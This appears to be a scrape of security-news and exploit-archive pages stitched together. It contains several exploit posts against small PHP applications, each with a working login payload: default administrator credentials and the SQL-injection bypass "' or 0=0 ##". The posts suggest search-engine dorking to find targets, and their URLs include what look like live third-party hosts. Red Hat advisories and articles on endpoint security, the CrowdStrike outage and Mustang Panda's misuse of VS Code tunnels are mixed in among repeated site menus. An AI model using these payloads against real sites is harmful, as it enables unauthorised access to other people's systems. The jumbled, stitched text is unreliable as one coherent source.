PDF Generator Web Application version 1.0 suffers from an ignored default credential vulnerability.

**PDF Generator Web Application 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

PDF Generator Web Application version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit, web

SHA-256 | ea0edf3e01f27c48e18ff7db4471b92d0d058e7c65718cf02003efd67a75fb49

Download | Favorite | View

**PDF Generator Web Application 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : PDF Generator Web Application v1.0 Insecure Settings Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

PDF Generator Web Application 1.0 Insecure Settings

Park Ticketing Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Park Ticketing Project 1.0 Auth By Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/12/Park-Ticketing-Management-System-Project.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/ptms/dashboard.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Park Ticketing Project 1.0 SQL Injection

Online Travel Agency System version 1.0 suffers from an ignored default credential vulnerability.

**Online Travel Agency System 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Online Travel Agency System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 33fc5279701fd33248284f756fca51419cb1e797d0158e5bc05d6612e87f5c60

Download | Favorite | View

**Online Travel Agency System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Travel Agency System v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/online-travel-agency-system-using-php.html                                                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Online Travel Agency System 1.0 Insecure Settings

Online Tours and Travels Management System version 1.0 suffers from an ignored default credential vulnerability.

**Online Tours and Travels Management System 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Online Tours and Travels Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4a5b9ca0712889f86abf481cbffe6181dc9758a00fca6adde682fe4a8dea1f53

Download | Favorite | View

**Online Tours and Travels Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Tours and Travels Management System v1.0 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Online Tours and Travels Management System 1.0 Insecure Settings

Online Survey System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Online Survey System 1.0 auth by pass Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/survey/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Survey System 1.0 SQL Injection

Red Hat Security Advisory 2024-6428-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include denial of service, memory exhaustion, remote SQL injection, and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6428.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix UpdateAdvisory ID:        RHSA-2024:6428-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6428Issue date:         2024-09-09Revision:           03CVE Names:          CVE-2024-5569====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.4Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* automation-controller: Django: Potential SQL injection in QuerySet.values() and values_list() (CVE-2024-42005)* automation-controller: Django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget (CVE-2024-41991)* automation-controller: Django: Potential denial-of-service vulnerability in django.utils.html.urlize() (CVE-2024-41990)* automation-controller: python-jose: algorithm confusion with OpenSSH ECDSA keys and other key formats (CVE-2024-33663)* automation-controller: python-social-auth: Improper Handling of Case Sensitivity in social-auth-app-django (CVE-2024-32879)* automation-controller: Gain access to the k8s API server via job execution with Container Group (CVE-2024-6840)* python3/python39-django: Potential SQL injection in QuerySet.values() and values_list() (CVE-2024-42005)* python3/python39-django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget (CVE-2024-41991)* python3/python39-django: Potential denial-of-service vulnerability in django.utils.html.urlize() (CVE-2024-41990)* python3/python39-django: Memory exhaustion in django.utils.numberformat.floatformat() (CVE-2024-41989)* python3/python39-django: Potential denial-of-service in django.utils.translation.get_supported_language_variant() (CVE-2024-39614)* python3/python39-django: Potential directory-traversal in django.core.files.storage.Storage.save() (CVE-2024-39330)* python3/python39-django: Username enumeration through timing difference for users with unusable passwords (CVE-2024-39329)* python3/python39-django: Potential denial-of-service in django.utils.html.urlize() (CVE-2024-38875)* python3/python39-grpcio: client communicating with a HTTP/2 proxy can poison the HPACK table between the proxy and the backend (CVE-2024-7246)* python3/python39-zipp: Denial of Service (infinite loop) via crafted zip file (CVE-2024-5569)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates and fixes for automation controller:* Updated the receptor to not automatically release the receptor work unit when \"RECEPTOR_KEEP_WORK_ON_ERROR\" is set to true (AAP-27635)* Updated the Help link in the REST API to point to the latest API Reference documentation (AAP-27573)* Fixed a timeout error in the UI when trying to load the Activity Stream (AAP-26772)* automation-controller has been updated to 4.5.10Updates and fixes for automation hub:* API browser now correctly escapes JSON values (AAH-3272, AAP-14463)* python3/python39-pulpcore has been updated to 3.28.31* python3/python39-pulp-ansible has been updated to 0.20.8Additional fixes:* Gunicorn python package will no longer obsolete itself when checking for or applying updates (AAP-28364)* python3/python39-django has been updated to 4.2.15* python3/python39-grpcio has been updated to 1.58.3* python3/python39-jmespath has been updated to 0.10.0-5* python3/python39-zipp has been updated to 3.19.2Solution:CVEs:CVE-2024-5569References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2277035https://bugzilla.redhat.com/show_bug.cgi?id=2277297https://bugzilla.redhat.com/show_bug.cgi?id=2295935https://bugzilla.redhat.com/show_bug.cgi?id=2295936https://bugzilla.redhat.com/show_bug.cgi?id=2295937https://bugzilla.redhat.com/show_bug.cgi?id=2295938https://bugzilla.redhat.com/show_bug.cgi?id=2296413https://bugzilla.redhat.com/show_bug.cgi?id=2298492https://bugzilla.redhat.com/show_bug.cgi?id=2302433https://bugzilla.redhat.com/show_bug.cgi?id=2302434https://bugzilla.redhat.com/show_bug.cgi?id=2302435https://bugzilla.redhat.com/show_bug.cgi?id=2302436

Red Hat Security Advisory 2024-6428-03

Red Hat Security Advisory 2024-6421-03 - An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6421.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bubblewrap and flatpak security updateAdvisory ID:        RHSA-2024:6421-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6421Issue date:         2024-09-09Revision:           03CVE Names:          CVE-2024-42472====================================================================Summary: An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Bubblewrap (/usr/bin/bwrap) is a core execution engine for unprivileged containers that works as a setuid binary on kernels without user namespaces.Security Fix(es):* flatpak: Access to files outside sandbox for apps using persistent= (--persist) (CVE-2024-42472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42472References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-6421-03

Endpoint security has been around for decades, but changes in device use and the quick evolution of new attacks have triggered the development of new security techniques.

Source: Dzmitry Skazau via Alamy Stock Photo

Because of their large attack surface made up of different sets — including laptops, desktops, mobile devices, and servers — endpoints are becoming the primary targets of increasingly sophisticated attacks. This diversity is further complicated by the variety of operating systems (OSs) being run on those devices. In addition, the location of these devices is often no longer tied only to company networks, due to the increase in hybrid and remote work, and more server workloads moving to the cloud.

To meet the growing needs of security teams, the endpoint security market is constantly evolving, albeit at an incremental rate recently. Endpoint security has been around for decades, but changes in device use and the quick evolution of new attacks have triggered the development of new security techniques.

Below are four areas for security professionals to focus on to establish and enhance their endpoint security. While not a comprehensive list, this should help security experts, both new and established, understand the core concepts around endpoint security.

**Baseline Security**

Endpoint protection starts with strong baseline security. Organizations must make optimal use of all of the features their OSes and applications provide that can help with endpoint protection. To do this, security experts should:

*   Use consistent application deployment methods: Restrict application deployments to known sources. Layer on a workflow for updating and maintaining approved applications.
    
*   Perform configuration management: Configure OSes and applications for security. For example, use hardening guidelines and manage browser add-ons and client applications' security capabilities.
    
*   Use auditing and logging: Understanding events on an endpoint starts with auditing and logging the right security events, and with having a process in place to monitor for security events. Aim to establish a single source of truth for endpoint status.
    

While providing a foundation for baseline security, this list is not exhaustive. Security leaders should also look into actions that include managing vulnerabilities for all OSs and managing backups.

**Endpoint Detection and Response**

Endpoint detection and response (EDR) tools store and monitor endpoint events to detect and hunt for suspicious behaviors, and also provide response capabilities to those events. Common events that are monitored include, but are not limited to, execution events, registry events, file events, and network events.

EDR, in its purest form, does not interrupt running processes; instead, it analyzes the resulting events to search for known indicators of compromise or patterns that indicate malicious behavior.

EDR tools can be likened to a data recorder, or "black box," for the endpoint devices on which they are installed. These tools gather telemetry data about the activity happening on those devices and make it available for examination later. Of course, storing the recorded data is not nearly enough — an EDR tool must also be able to present the data to an administrator in a way that enables further analysis using both automated and human-driven means.

**Automated Moving Target Defense**

Automated moving target defense (AMTD) is an emerging technology that focuses on constantly changing the attack surface of a system or network. AMTD makes it harder for attackers to identify and exploit vulnerabilities by dynamically modifying the process structure, memory space, system configurations, software stack, or network characteristics. This proactive approach helps to improve cyber defense and mitigate the risk of successful attacks.

Endpoint defense with AMTD can include:

*   Enhancing memory defense through morphing or enhanced randomization
    
*   Augmenting confidential computing enclaves with AMTD proactive defense
    
*   Enhancing runtime software hardening (polymorphism of code or inputs)
    
*   Automatic endpoint self-healing from known good files storage
    
*   Applying AMTD to file storage or storage access channels (command and storage polymorphing)
    

AMTD for endpoints and endpoint software is a set of technologies that make it harder for attackers to reverse engineer and exploit endpoint OSes and software technologies. AMTD works by introducing unpredictable and frequent changes in the attack surface of the applications and OSs on which it is used.

**Mobile Threat Defense**

The mobile attack landscape has continued to grow and change with the increase of smartphone and tablet sales, and with the proliferation of bring-your-own-device arrangements in enterprises. Every year, we see new statistics claiming hundreds of percentage points of growth in mobile malware.

The MTD market includes vendors that use some combination of the following mobile protection methods for Android and iOS:

*   Behavioral anomaly and configuration detection
    

*   Protection against device attacks, network attacks, and malicious and leaky apps
    
*   Mobile anti-phishing protection
    
*   OS-, hardware- and application-based vulnerability assessment, monitoring, and compliance
    
*   Crowdsourced threat intelligence
    

Baseline security, EDR, AMTD, and MTD are just a few crucial tools security leaders can use to improve their endpoints' resilience against attacks. There continue to be many other layers of security designed to contribute to the protection of endpoints, and security leaders must take a holistic approach, as this topic is foundational for enterprises who will need to adjust their strategy for changing and increased variation in devices, agile work environments, and increasingly sophisticated security threats.

**About the Author**

Director Analyst, Gartner

Eric Grenier is a Director Analyst at Gartner working in the Technical Professionals Security Technology and Infrastructure team, focusing on Endpoint Security including endpoint protection and endpoint detection and response.

How to Establish &amp; Enhance Endpoint Security

The proliferation of cybersecurity tools has created an illusion of security. Organizations often believe that by deploying a firewall, antivirus software, intrusion detection systems, identity threat detection and response, and other tools, they are adequately protected. However, this approach not only fails to address the fundamental issue of the attack surface but also introduces dangerous

Data Protection / Threat Detection

The proliferation of cybersecurity tools has created an illusion of security. Organizations often believe that by deploying a firewall, antivirus software, intrusion detection systems, identity threat detection and response, and other tools, they are adequately protected. However, this approach not only fails to address the fundamental issue of the attack surface but also introduces dangerous third-party risk to the mix.

The world of cybersecurity is in a constant state of flux, with cybercriminals becoming increasingly sophisticated in their tactics. In response, organizations are investing heavily in cybersecurity tools, hoping to build an impenetrable fortress around their digital assets. However, the belief that adding "just one more cybersecurity tool" will magically fix your attack surface and enhance your protection is a dangerous misconception.

**The limitations of cybersecurity tools**

Cybersecurity tools, while essential, have inherent limitations. They are designed to address specific threats and vulnerabilities, and they often rely on signature-based detection, which can be easily bypassed by zero-day attacks. Moreover, tools can generate a deluge of alerts, overwhelming security teams and making it difficult to identify genuine threats. According to this Gartner survey, 75 percent of organizations are pursuing vendor consolidation. The number one reason cited? Reducing complexity.

Furthermore, tools often operate in isolation, creating silos of information that hinder effective threat detection and response. Without a holistic view of the attack surface, organizations remain vulnerable to attacks that exploit gaps in their defences.

**When the net is not positive: The hidden dangers of adding another tool**

Ironically, each new cybersecurity tool you add to your arsenal can inadvertently expand your attack surface by introducing third-party risk. Every vendor you engage with, from cloud service providers to software developers, becomes a potential entry point for cybercriminals. Their own security practices, or lack thereof, can directly impact your organization's security posture. A data breach at a third-party vendor can expose your sensitive information. A vulnerability in their software can provide a backdoor into your network. This complex web of interconnected systems and dependencies makes it increasingly challenging to manage and mitigate third-party risks effectively. We saw this play out in the Sisense breach, where customers trusting a third-party had their credentials stolen – an incident strong enough to prompt a CISA warning.

And let's remember the CIA-triad of cybersecurity: confidentiality, integrity and availability. Losing availability is equally damaging to the business, independent of the root cause: outages caused by security tools and outages resulting from a DOS attack are equally harmful. And we saw from the CrowdStrike outage that security tools can and do inflict serious damage. This impact is due to the preferential access these tools get to your systems: in the case of CrowdStrike, it gets kernel-level access to every endpoint to ensure full visibility. Incidentally, this same deep access made the Falcon platform outage so incredibly devastating and made remedial efforts expensive.

This is true for almost all IT security products. Your tool designed to mitigate the risk has the potential to take down the systems it's intended to protect. Your firewall misconfiguration can take down your network, your email spam filter can take down your email communication, and your access control solution can lock out your frontline workers – the list goes on. And while these tools vastly improve the security posture of the organization, customers should look to strike a balance between adding third-party risk from the software supply chain and mitigating risk with every new tool.

**Simplifying the chaos with a unified platform**

The danger arises from the complexity we mentioned above. This is now seen as the single biggest challenge in cybersecurity, motivating customers to move to larger, unified platforms in SASE and XDR – according to the cited Gartner survey – but also in identity security. Analysts are pushing customers towards identity fabrics and unified identity for this exact reason: it reduces complexity and brings together disparate tools in a pre-validated, pre-integrated manner. It's no surprise that every identity vendor is touting their "unified suite," regardless of its state, the actual benefits it offers customers or whether it truly has the potential to unify the customer's entire internal identity landscape.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

One More Tool Will Do It? Reflecting on the CrowdStrike Fallout

The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia.
"This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a

Cyber Espionage / Malware

The China-linked advanced persistent threat (APT) group known as **Mustang Panda** has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia.

"This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a report, describing it as a "relatively new technique" that was first demonstrated in September 2023 by Truvis Thornton.

The campaign is assessed to be a continuation of a previously documented attack activity aimed at an unnamed Southeast Asian government entity in late September 2023.

Mustang Panda, also known by the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, and Red Lich, has been operational since 2012, routinely conducting cyber espionage campaigns targeting government and religious entities across Europe and Asia, particularly those located in South China Sea countries.

The latest observed attack sequence is notable for its abuse of Visual Studio Code's reverse shell to execute arbitrary code and deliver additional payloads.

"To abuse Visual Studio Code for malicious purposes, an attacker can use the portable version of code.exe (the executable file for Visual Studio Code), or an already installed version of the software," Fakterman noted. "By running the command code.exe tunnel, an attacker receives a link that requires them to log into GitHub with their own account."

Once this step is complete, the attacker is redirected to a Visual Studio Code web environment that's connected to the infected machine, allowing them to run commands or create new files.

It's worth pointing out that the malicious use of this technique was previously highlighted by a Dutch cybersecurity firm mnemonic in connection with zero-day exploitation of a vulnerability in Check Point's Network Security gateway products (CVE-2024-24919, CVSS score: 8.6) earlier this year.

Unit 42 said the Mustang Panda actor leveraged the mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data. Furthermore, the attacker is said to have used OpenSSH to execute commands, transfer files, and spread across the network.

That's not all. A closer analysis of the infected environment has revealed a second cluster of activity "occurring simultaneously and at times even on the same endpoints" that utilized the ShadowPad malware, a modular backdoor widely shared by Chinese espionage groups.

It's currently unclear if these two intrusion sets are related to one another, or if two different groups are "piggybacking on each other's access."

"Based on the forensic evidence and timeline, one could conclude that these two clusters originated from the same threat actor (Stately Taurus)," Fakterman said. "However, there could be other possible explanations that can account for this connection, such as a collaborative effort between two Chinese APT threat actors."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability